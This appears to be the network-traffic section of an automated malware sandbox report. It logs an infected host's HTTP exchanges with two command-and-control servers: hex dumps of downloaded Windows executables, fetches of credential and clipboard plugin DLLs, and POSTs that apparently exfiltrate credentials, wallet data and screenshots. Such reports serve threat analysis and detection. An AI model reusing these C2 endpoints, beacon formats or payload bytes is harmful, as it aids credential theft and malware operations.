00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:46 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:53:20 GMTETag: "4b400-6290c54e671ba"Accept-Ranges: bytesContent-Length: 308224Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:38:00 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4

Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU4NzA=Host: 185.81.68.147Content-Length: 86022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU4NzA=Host: 185.81.68.148Content-Length: 86022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 38 31 30 32 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000810201&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 38 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000820101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147If-Modified-Since: Thu, 12 Dec 2024 05:53:20 GMTIf-None-Match: "4b400-6290c54e671ba"
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxOA==Host: 185.81.68.147Content-Length: 4778Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 38 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000830101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxOA==Host: 185.81.68.147Content-Length: 4778Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxOA==Host: 185.81.68.148Content-Length: 4778Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxOA==Host: 185.81.68.148Content-Length: 4778Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 38 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000840101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
